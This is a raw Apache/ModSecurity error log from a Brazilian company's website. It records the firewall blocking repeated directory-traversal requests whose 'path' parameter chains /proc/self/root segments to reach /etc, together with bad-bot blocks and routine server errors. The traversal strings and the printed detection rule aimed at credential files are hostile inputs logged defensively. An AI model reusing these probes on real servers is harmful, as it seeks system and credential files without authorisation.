https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:07:06.013829 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:07:08.618091 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:36200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxzjP-YZRR_7pZ7nDK3UgAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:07:25.202377 2026] [:error] [pid 21563:tid 140411716749056] [client 74.7.243.128:45332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxznUpm7ZmxKZTM4bZx0gAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:07:29.123006 2026] [proxy_fcgi:error] [pid 5816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:07:40.548597 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:59008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxzrOoXxyEfFpUF8f851gAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:07:49.656268 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:57164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxzteoXxyEfFpUF8f853AAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:07:51.185862 2026] [proxy_fcgi:error] [pid 19655:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40126] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:08:06.619409 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.244.43:58496] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxzxgbLMZ6AikZjR9WH5gAAAAQ"]
[Thu Mar 19 19:08:14.132917 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:08:30.561960 2026] [core:alert] [pid 20435:tid 140411699963648] [client 57.141.18.76:43882] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 19:08:38.129787 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41366] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:08:48.584616 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:45952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxz8AkwaGbbGflqUZD3TQAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 19:08:53.948951 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:46800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxz9QkwaGbbGflqUZD3TgAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:08:55.167214 2026] [core:alert] [pid 26799:tid 140411590858496] [client 57.141.18.86:44512] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 19:09:00.872577 2026] [mime_magic:error] [pid 14269:tid 140411641214720] (70014)End of file found: [client 57.141.18.122:44366] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:09:04.662349 2026] [mime_magic:error] [pid 20435:tid 140411574073088] (70014)End of file found: [client 57.141.18.8:44644] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:09:05.137827 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:09:17.802766 2026] [mime_magic:error] [pid 5816:tid 140411716749056] (70014)End of file found: [client 57.141.18.1:45170] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:09:32.424258 2026] [:error] [pid 7545:tid 140411666392832] [client 74.7.243.128:59094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx0HH8B84UptSoTJtY7RgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:09:37.131504 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:09:44.253000 2026] [:error] [pid 5816:tid 140411691570944] [client 74.7.243.128:44462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx0KJfmNfuxceSuAELALQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:09:54.204120 2026] [:error] [pid 5816:tid 140411691570944] [client 74.7.243.128:44462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx0MpfmNfuxceSuAELAMQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 19:10:06.137823 2026] [proxy_fcgi:error] [pid 7235:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43666] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:10:08.975128 2026] [core:alert] [pid 20435:tid 140411574073088] [client 57.141.18.28:46192] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 19:10:37.301842 2026] [proxy_fcgi:error] [pid 19655:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44248] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:10:43.684391 2026] [mime_magic:error] [pid 21219:tid 140411716749056] (70014)End of file found: [client 74.7.241.31:36282] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/ssl
[Thu Mar 19 19:10:54.372379 2026] [:error] [pid 20435:tid 140411574073088] [client 74.7.243.128:41844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx0bpJaM1-0uhhUQJNFqAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:10:54.550207 2026] [mime_magic:error] [pid 14269:tid 140411699963648] (70014)End of file found: [client 57.141.18.0:46610] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:11:00.738365 2026] [:error] [pid 20435:tid 140411574073088] [client 74.7.228.61:45764] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abx0dJJaM1-0uhhUQJNFqwAAAJQ"]
[Thu Mar 19 19:11:12.588311 2026] [:error] [pid 19655:tid 140411725141760] [client 74.7.243.128:59376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx0gE1ujooLWdUDGy4BFQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:11:18.033912 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45170] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:11:27.890612 2026] [mime_magic:error] [pid 7235:tid 140411674785536] (70014)End of file found: [client 57.141.18.28:47056] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:11:33.216683 2026] [:error] [pid 20435:tid 140411574073088] [client 74.7.243.128:37614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx0lZJaM1-0uhhUQJNFuwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:11:44.680910 2026] [:error] [pid 20435:tid 140411574073088] [client 74.7.243.128:37614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx0oJJaM1-0uhhUQJNFwwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:11:48.122143 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45898] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:12:13.125377 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46562] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:12:37.136602 2026] [proxy_fcgi:error] [pid 19655:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:12:59.132557 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:13:10.742706 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.244.43:36874] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abx09uoXxyEfFpUF8f86CQAAAUM"]
[Thu Mar 19 19:13:19.215648 2026] [mime_magic:error] [pid 21563:tid 140411716749056] (70014)End of file found: [client 57.141.18.120:48656] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:13:21.130358 2026] [proxy_fcgi:error] [pid 7235:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:13:22.393945 2026] [:error] [pid 7545:tid 140411540502272] [client 74.7.243.128:57770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx1An8B84UptSoTJtY7iAAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 19:13:43.145808 2026] [proxy_fcgi:error] [pid 20435:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49082] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:14:00.964273 2026] [mime_magic:error] [pid 30077:tid 140411683178240] (70014)End of file found: [client 74.7.241.31:34510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/opt/puppetlabs/puppet/lib/ruby/vendor_ruby/mcollective
[Thu Mar 19 19:14:04.905328 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:32806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx1LPqxLDW4GITHUkSU7wAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 19:14:07.125889 2026] [proxy_fcgi:error] [pid 21219:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49704] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:14:29.077949 2026] [proxy_fcgi:error] [pid 5816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50334] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:14:53.094004 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50930] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:15:20.065907 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51378] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:15:47.973802 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51772] AH01075: Error dispatching request to : (polling)
